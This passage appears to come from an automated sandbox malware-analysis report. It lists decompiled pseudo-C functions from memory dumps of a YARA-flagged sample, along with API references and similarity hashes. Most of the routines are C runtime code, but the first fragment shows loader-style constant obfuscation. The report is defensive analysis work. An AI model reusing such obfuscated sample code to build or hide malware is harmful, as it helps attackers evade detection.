                                                      				_v28 = _v28 ^ 0xfb1ed4cf;
                                                      				_v24 = 0x2b1c;
                                                      				_v24 = _v24 * 6;
                                                      				_v24 = _v24 / _t126;
                                                      				_v24 = _v24 ^ 0x00001462;
                                                      				_t104 = E00237551(_a16, _v24);
                                                      				_t127 = _t104;
                                                      				if(_t104 != 0) {
                                                      					_t128 = E00237663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
                                                      					E00244F7D(_v32, _v28, _t127);
                                                      				}
                                                      				return _t128;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: %3on
                                                      • API String ID: 2962429428-3639271662
                                                      • Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                                      • Instruction ID: d035d1998c2b6168c77ef3eba76f92018f1f42e0a001c62a10c0f8faf4b32d1a
                                                      • Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                                      • Instruction Fuzzy Hash: 814106B1E0120AABDB04DFE5C98A8EEFBB5EB44704F208159E911B7250D3B89A55CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: j^
                                                      • API String ID: 0-2773993462
                                                      • Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                                      • Instruction ID: a585ac990041d3756322aa3e789d57f91bedcb47b5737cae3c9d3f7d62583d15
                                                      • Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                                      • Instruction Fuzzy Hash: E931EEB4C0070AEBDF48DFA4C98A49EBFB5FB00304F608089D511BA2A0D3B94B959F80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                                      • Instruction ID: 3d6219b04f405ae4af969dd1b75b4a62bc0ae45e0902e2a13cf4bc50be2d3fff
                                                      • Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                                      • Instruction Fuzzy Hash: 52515271C1121ADFDF49CFA0D98A5EEBBB1FB44304F20819AC111BA2A0D7B91B55CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27afc4b33dc863ca0ef44d4182d6d04fa1b0fd1fb92b3c2506f1771c419c0529
                                                      • Instruction ID: bfddd84c6e0aa02ec384d4b0d4cae425945b9098056edd306ccb7ec1b40778cc
                                                      • Opcode Fuzzy Hash: 27afc4b33dc863ca0ef44d4182d6d04fa1b0fd1fb92b3c2506f1771c419c0529
                                                      • Instruction Fuzzy Hash: 4A4167B6C11209EFDB48CFA5D94A4EEFBB5FF48314F20809AD500BA290D7B85A45CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b71f4e51cfe0b529c91e2bb35bfcd7cb8787749fa41fb63f04ebe13c65c991d0
                                                      • Instruction ID: de1c73cf50021e2a74e250112e23350dc3b498515051980c9a08b95e3870d00d
                                                      • Opcode Fuzzy Hash: b71f4e51cfe0b529c91e2bb35bfcd7cb8787749fa41fb63f04ebe13c65c991d0
                                                      • Instruction Fuzzy Hash: 53410171D0131DDBDB48CFA5D68A4DEBBB0BB14758F208059C115BA290C7B80B49CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                                      • Instruction ID: c8fafd9494a8f10aad25057eb98bc8a563c6329c5cdb18cbf686bbaa6c1a81ae
                                                      • Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                                      • Instruction Fuzzy Hash: 5121ACB1E10219ABDB48DFA4D88A4AFFBB0FB00308F648059D516B3241E3B54B58CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                                      • Instruction ID: 3921a9a908e8feceff9a395b938e22c996d34453c3bf95e48f3fa4752c9eb4f8
                                                      • Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                                      • Instruction Fuzzy Hash: 5C21E3B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B6160D3B84B55CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E10007337(void* __eax, void* __ebx) {
                                                      				intOrPtr _t5;
                                                      				intOrPtr _t6;
                                                      				intOrPtr _t7;
                                                      				LONG* _t8;
                                                      				void* _t9;
                                                      				void* _t14;
                                                      				void* _t24;
                                                      				intOrPtr* _t25;
                                                      				intOrPtr* _t26;
                                                      
                                                      				_t14 = __ebx;
                                                      				__imp__DecodePointer( *0x10014d88);
                                                      				_t25 =  *0x100132dc; // 0x0
                                                      				_t24 = __eax;
                                                      				if(_t25 != 0) {
                                                      					while( *_t25 != 0) {
                                                      						E10004732( *_t25);
                                                      						_t25 = _t25 + 4;
                                                      						if(_t25 != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					_t25 =  *0x100132dc; // 0x0
                                                      				}
                                                      				_push(_t14);
                                                      				E10004732(_t25);
                                                      				_t26 =  *0x100132d8; // 0x0
                                                      				 *0x100132dc = 0;
                                                      				if(_t26 != 0) {
                                                      					while( *_t26 != 0) {
                                                      						E10004732( *_t26);
                                                      						_t26 = _t26 + 4;
                                                      						if(_t26 != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					_t26 =  *0x100132d8; // 0x0
                                                      				}
                                                      				E10004732(_t26);
                                                      				 *0x100132d8 = 0;
                                                      				E10004732( *0x100132d4);
                                                      				_t5 = E10004732( *0x100132d0);
                                                      				 *0x100132d4 = 0;
                                                      				 *0x100132d0 = 0;
                                                      				if(_t24 != 0xffffffff) {
                                                      					_t5 = E10004732(_t24);
                                                      				}
                                                      				__imp__EncodePointer(0);
                                                      				 *0x10014d88 = _t5;
                                                      				_t6 =  *0x10013c1c; // 0x0
                                                      				if(_t6 != 0) {
                                                      					E10004732(_t6);
                                                      					 *0x10013c1c = 0;
                                                      				}
                                                      				_t7 =  *0x10013c20; // 0x0
                                                      				if(_t7 != 0) {
                                                      					E10004732(_t7);
                                                      					 *0x10013c20 = 0;
                                                      				}
                                                      				_t8 = InterlockedDecrement( *0x10012394);
                                                      				if(_t8 == 0) {
                                                      					_t8 =  *0x10012394; // 0x10012690
                                                      					if(_t8 != 0x10012690) {
                                                      						_t9 = E10004732(_t8);
                                                      						 *0x10012394 = 0x10012690;
                                                      						return _t9;
                                                      					}
                                                      				}
                                                      				return _t8;
                                                      			}













                                                      APIs
                                                      • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                                      • _free.LIBCMT ref: 10007358
                                                        • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                                        • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                                      • _free.LIBCMT ref: 1000736B
                                                      • _free.LIBCMT ref: 10007389
                                                      • _free.LIBCMT ref: 1000739B
                                                      • _free.LIBCMT ref: 100073AC
                                                      • _free.LIBCMT ref: 100073B7
                                                      • _free.LIBCMT ref: 100073D1
                                                      • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                                      • _free.LIBCMT ref: 100073ED
                                                      • _free.LIBCMT ref: 10007403
                                                      • InterlockedDecrement.KERNEL32 ref: 10007415
                                                      • _free.LIBCMT ref: 1000742F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                      • String ID:
                                                      • API String ID: 4264854383-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 55%
                                                      			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                      				signed int _v8;
                                                      				char _v528;
                                                      				char _v1048;
                                                      				void* _v1052;
                                                      				void* _v1056;
                                                      				char _v1060;
                                                      				void* _v1064;
                                                      				char _v1068;
                                                      				char _v1084;
                                                      				char _v1100;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t63;
                                                      				char* _t67;
                                                      				intOrPtr* _t71;
                                                      				char _t72;
                                                      				intOrPtr _t75;
                                                      				intOrPtr* _t76;
                                                      				intOrPtr _t80;
                                                      				intOrPtr* _t81;
                                                      				intOrPtr* _t83;
                                                      				intOrPtr _t84;
                                                      				intOrPtr* _t85;
                                                      				intOrPtr _t86;
                                                      				intOrPtr* _t87;
                                                      				intOrPtr* _t89;
                                                      				intOrPtr _t93;
                                                      				intOrPtr* _t94;
                                                      				intOrPtr _t95;
                                                      				intOrPtr _t98;
                                                      				intOrPtr _t100;
                                                      				intOrPtr _t104;
                                                      				intOrPtr* _t109;
                                                      				intOrPtr _t110;
                                                      				intOrPtr _t112;
                                                      				intOrPtr* _t113;
                                                      				void* _t115;
                                                      				intOrPtr* _t120;
                                                      				intOrPtr* _t129;
                                                      				intOrPtr* _t130;
                                                      				intOrPtr* _t132;
                                                      				intOrPtr* _t136;
                                                      				signed int _t138;
                                                      				intOrPtr _t152;
                                                      
                                                      				_t63 =  *0x10012158; // 0x5da49213
                                                      				_v8 = _t63 ^ _t138;
                                                      				_t137 = _a4;
                                                      				_t136 = _a8;
                                                      				_t115 = __ecx;
                                                      				E100043E0( &_v528, 0, 0x208);
                                                      				_t67 =  &_v528;
                                                      				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
                                                      				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
                                                      					L25:
                                                      					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
                                                      				} else {
                                                      					_t71 =  *((intOrPtr*)(_t115 + 0x18));
                                                      					_t134 =  &_v1064;
                                                      					_v1064 = 0;
                                                      					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
                                                      					if(_t72 != 0) {
                                                      						_t137 = 0x8000ffff;
                                                      						L24:
                                                      						__imp__CoTaskMemFree(_v1068);
                                                      						goto L25;
                                                      					}
                                                      					_t120 = _v1064;
                                                      					_t134 =  &_v1060;
                                                      					_v1060 = _t72;
                                                      					_v1056 = _t120;
                                                      					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
                                                      					_t137 = _t75;
                                                      					if(_t75 == 0) {
                                                      						L6:
                                                      						if(_t152 < 0) {
                                                      							L22:
                                                      							_t76 = _v1064;
                                                      							 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                      							goto L24;
                                                      						}
                                                      						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
                                                      						_t137 = _t80;
                                                      						if(_t80 < 0) {
                                                      							L21:
                                                      							_t81 = _v1060;
                                                      							 *((intOrPtr*)( *_t81 + 8))(_t81);
                                                      							goto L22;
                                                      						}
                                                      						_v1056 = 0;
                                                      						if( *_t136 == 0) {
                                                      							_t83 = _v1060;
                                                      							_t134 =  &_v1048;
                                                      							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
                                                      							_t137 = _t84;
                                                      							if(_t84 != 0) {
                                                      								goto L21;
                                                      							}
                                                      							_t85 = _v1060;
                                                      							_t134 =  &_v1052;
                                                      							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
                                                      							_t137 = _t86;
                                                      							if(_t86 < 0) {
                                                      								L20:
                                                      								_t87 = _v1056;
                                                      								 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                      								goto L21;
                                                      							}
                                                      							L19:
                                                      							_t89 = _v1052;
                                                      							 *((intOrPtr*)( *_t89 + 8))(_t89);
                                                      							goto L20;
                                                      						}
                                                      						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
                                                      						_t137 = _t93;
                                                      						if(_t93 < 0) {
                                                      							goto L21;
                                                      						}
                                                      						_t94 = _v1056;
                                                      						_t134 =  &_v1052;
                                                      						_v1052 = 0;
                                                      						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
                                                      						_t137 = _t95;
                                                      						if(_t95 < 0) {
                                                      							goto L20;
                                                      						}
                                                      						asm("xorps xmm0, xmm0");
                                                      						asm("movq [ebp-0x448], xmm0");
                                                      						asm("movq [ebp-0x440], xmm0");
                                                      						_t98 = E10002390( &_v528,  &_v1100);
                                                      						_t137 = _t98;
                                                      						if(_t98 >= 0) {
                                                      							asm("xorps xmm0, xmm0");
                                                      							asm("movq [ebp-0x438], xmm0");
                                                      							asm("movq [ebp-0x430], xmm0");
                                                      							_t100 = E10002390(_v1068,  &_v1084);
                                                      							_t136 = __imp__#9;
                                                      							_t137 = _t100;
                                                      							if(_t100 >= 0) {
                                                      								_t129 = _v1052;
                                                      								asm("movq xmm0, [ebp-0x448]");
                                                      								_t134 =  *_t129;
                                                      								asm("movq [eax], xmm0");
                                                      								asm("movq xmm0, [ebp-0x440]");
                                                      								asm("movq [eax+0x8], xmm0");
                                                      								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
                                                      								_t137 = _t104;
                                                      								if(_t104 >= 0) {
                                                      									_t130 = _v1052;
                                                      									asm("movq xmm0, [ebp-0x438]");
                                                      									_t134 =  *_t130;
                                                      									asm("movq [eax], xmm0");
                                                      									asm("movq xmm0, [ebp-0x430]");
                                                      									asm("movq [eax+0x8], xmm0");
                                                      									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
                                                      								}
                                                      								 *_t136( &_v1084);
                                                      							}
                                                      							 *_t136( &_v1100);
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					_t109 =  *((intOrPtr*)(_t115 + 0x18));
                                                      					_t134 =  &_v1052;
                                                      					_v1052 = 0;
                                                      					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
                                                      					_t137 = _t110;
                                                      					if(_t110 < 0) {
                                                      						goto L22;
                                                      					}
                                                      					_t132 = _v1056;
                                                      					_t134 =  &_v1060;
                                                      					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
                                                      					_t137 = _t112;
                                                      					_t113 = _v1052;
                                                      					 *((intOrPtr*)( *_t113 + 8))(_t113);
                                                      					_t152 = _t112;
                                                      					goto L6;
                                                      				}
                                                      			}

                                                      APIs
                                                      • _memset.LIBCMT ref: 10002F9C
                                                      • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                                        • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                        • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                        • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                        • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                        • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                        • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                                      • VariantClear.OLEAUT32(?), ref: 100031F1
                                                      • VariantClear.OLEAUT32(?), ref: 100031FA
                                                      • CoTaskMemFree.OLE32(?), ref: 1000327D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                                      • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                                      • API String ID: 2822920939-4160240301
                                                      • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                                      • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                                      • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                                      • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int* _t81;
                                                      				void* _t86;
                                                      				long _t90;
                                                      				intOrPtr _t94;
                                                      				signed int _t98;
                                                      				signed int _t99;
                                                      				signed char _t103;
                                                      				intOrPtr* _t105;
                                                      				intOrPtr _t106;
                                                      				intOrPtr* _t109;
                                                      				signed char _t111;
                                                      				long _t119;
                                                      				signed int _t130;
                                                      				signed int* _t134;
                                                      				intOrPtr _t135;
                                                      				signed int* _t138;
                                                      				void** _t139;
                                                      				intOrPtr _t141;
                                                      				void* _t142;
                                                      				signed int _t143;
                                                      				void** _t147;
                                                      				signed int _t149;
                                                      				void* _t150;
                                                      				void** _t154;
                                                      				void* _t155;
                                                      
                                                      				_push(0x64);
                                                      				_push(0x10010d68);
                                                      				E10008040(__ebx, __edi, __esi);
                                                      				E100091AB(0xb);
                                                      				_t130 = 0;
                                                      				 *(_t155 - 4) = 0;
                                                      				if( *0x10014c80 == 0) {
                                                      					_push(0x40);
                                                      					_t141 = 0x20;
                                                      					_push(_t141);
                                                      					_t81 = E10007F1D();
                                                      					_t134 = _t81;
                                                      					 *(_t155 - 0x24) = _t134;
                                                      					if(_t134 != 0) {
                                                      						 *0x10014c80 = _t81;
                                                      						 *0x10014c64 = _t141;
                                                      						while(_t134 <  &(_t81[0x200])) {
                                                      							_t134[1] = 0xa00;
                                                      							 *_t134 =  *_t134 | 0xffffffff;
                                                      							_t134[2] = _t130;
                                                      							_t134[9] = _t134[9] & 0x00000080;
                                                      							_t134[9] = _t134[9] & 0x0000007f;
                                                      							_t134[9] = 0xa0a;
                                                      							_t134[0xe] = _t130;
                                                      							_t134[0xd] = _t130;
                                                      							_t134 =  &(_t134[0x10]);
                                                      							 *(_t155 - 0x24) = _t134;
                                                      							_t81 =  *0x10014c80;
                                                      						}
                                                      						GetStartupInfoW(_t155 - 0x74);
                                                      						if( *((short*)(_t155 - 0x42)) == 0) {
                                                      							while(1) {
                                                      								L31:
                                                      								 *(_t155 - 0x2c) = _t130;
                                                      								if(_t130 >= 3) {
                                                      									break;
                                                      								}
                                                      								_t147 =  *0x10014c80 + (_t130 << 6);
                                                      								 *(_t155 - 0x24) = _t147;
                                                      								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                                                      									_t147[1] = 0x81;
                                                      									if(_t130 != 0) {
                                                      										_t66 = _t130 - 1; // -1
                                                      										asm("sbb eax, eax");
                                                      										_t90 =  ~_t66 + 0xfffffff5;
                                                      									} else {
                                                      										_t90 = 0xfffffff6;
                                                      									}
                                                      									_t142 = GetStdHandle(_t90);
                                                      									if(_t142 == 0xffffffff || _t142 == 0) {
                                                      										L47:
                                                      										_t147[1] = _t147[1] | 0x00000040;
                                                      										 *_t147 = 0xfffffffe;
                                                      										_t94 =  *0x10013c48; // 0x0
                                                      										if(_t94 != 0) {
                                                      											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                      										}
                                                      										goto L49;
                                                      									} else {
                                                      										_t98 = GetFileType(_t142);
                                                      										if(_t98 == 0) {
                                                      											goto L47;
                                                      										}
                                                      										 *_t147 = _t142;
                                                      										_t99 = _t98 & 0x000000ff;
                                                      										if(_t99 != 2) {
                                                      											if(_t99 != 3) {
                                                      												L46:
                                                      												_t70 =  &(_t147[3]); // -268520564
                                                      												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                      												_t147[2] = _t147[2] + 1;
                                                      												goto L49;
                                                      											}
                                                      											_t103 = _t147[1] | 0x00000008;
                                                      											L45:
                                                      											_t147[1] = _t103;
                                                      											goto L46;
                                                      										}
                                                      										_t103 = _t147[1] | 0x00000040;
                                                      										goto L45;
                                                      									}
                                                      								} else {
                                                      									_t147[1] = _t147[1] | 0x00000080;
                                                      									L49:
                                                      									_t130 = _t130 + 1;
                                                      									continue;
                                                      								}
                                                      							}
                                                      							 *(_t155 - 4) = 0xfffffffe;
                                                      							E100079DD();
                                                      							L2:
                                                      							_t86 = 1;
                                                      							L3:
                                                      							return E10008085(_t86);
                                                      						}
                                                      						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                                                      						if(_t105 == 0) {
                                                      							goto L31;
                                                      						}
                                                      						_t135 =  *_t105;
                                                      						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                                      						_t106 = _t105 + 4;
                                                      						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                      						 *(_t155 - 0x20) = _t106 + _t135;
                                                      						if(_t135 >= 0x800) {
                                                      							_t135 = 0x800;
                                                      							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                                                      						}
                                                      						_t149 = 1;
                                                      						 *(_t155 - 0x30) = 1;
                                                      						while( *0x10014c64 < _t135) {
                                                      							_t138 = E10007F1D(_t141, 0x40);
                                                      							 *(_t155 - 0x24) = _t138;
                                                      							if(_t138 != 0) {
                                                      								0x10014c80[_t149] = _t138;
                                                      								 *0x10014c64 =  *0x10014c64 + _t141;
                                                      								while(_t138 <  &(0x10014c80[_t149][0x200])) {
                                                      									_t138[1] = 0xa00;
                                                      									 *_t138 =  *_t138 | 0xffffffff;
                                                      									_t138[2] = _t130;
                                                      									_t138[9] = _t138[9] & 0x00000080;
                                                      									_t138[9] = 0xa0a;
                                                      									_t138[0xe] = _t130;
                                                      									_t138[0xd] = _t130;
                                                      									_t138 =  &(_t138[0x10]);
                                                      									 *(_t155 - 0x24) = _t138;
                                                      								}
                                                      								_t149 = _t149 + 1;
                                                      								 *(_t155 - 0x30) = _t149;
                                                      								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                                      								continue;
                                                      							}
                                                      							_t135 =  *0x10014c64;
                                                      							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                                      							break;
                                                      						}
                                                      						_t143 = _t130;
                                                      						 *(_t155 - 0x2c) = _t143;
                                                      						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                      						_t139 =  *(_t155 - 0x20);
                                                      						while(_t143 < _t135) {
                                                      							_t150 =  *_t139;
                                                      							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                                                      								L26:
                                                      								_t143 = _t143 + 1;
                                                      								 *(_t155 - 0x2c) = _t143;
                                                      								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                      								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                      								_t139 =  &(_t139[1]);
                                                      								 *(_t155 - 0x20) = _t139;
                                                      								continue;
                                                      							} else {
                                                      								_t111 =  *_t109;
                                                      								if((_t111 & 0x00000001) == 0) {
                                                      									goto L26;
                                                      								}
                                                      								if((_t111 & 0x00000008) != 0) {
                                                      									L24:
                                                      									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                                      									 *(_t155 - 0x24) = _t154;
                                                      									 *_t154 =  *_t139;
                                                      									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                      									_t38 =  &(_t154[3]); // 0xd
                                                      									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                      									_t154[2] = _t154[2] + 1;
                                                      									_t139 =  *(_t155 - 0x20);
                                                      									L25:
                                                      									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                                      									goto L26;
                                                      								}
                                                      								_t119 = GetFileType(_t150);
                                                      								_t139 =  *(_t155 - 0x20);
                                                      								if(_t119 == 0) {
                                                      									goto L25;
                                                      								}
                                                      								goto L24;
                                                      							}
                                                      						}
                                                      						goto L31;
                                                      					}
                                                      					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                                      					_t86 = 0;
                                                      					goto L3;
                                                      				}
                                                      				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                                      				goto L2;
                                                      			}


                                                      APIs
                                                      • __lock.LIBCMT ref: 10007727
                                                        • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                                        • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                                        • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                                      • __calloc_crt.LIBCMT ref: 1000775E
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
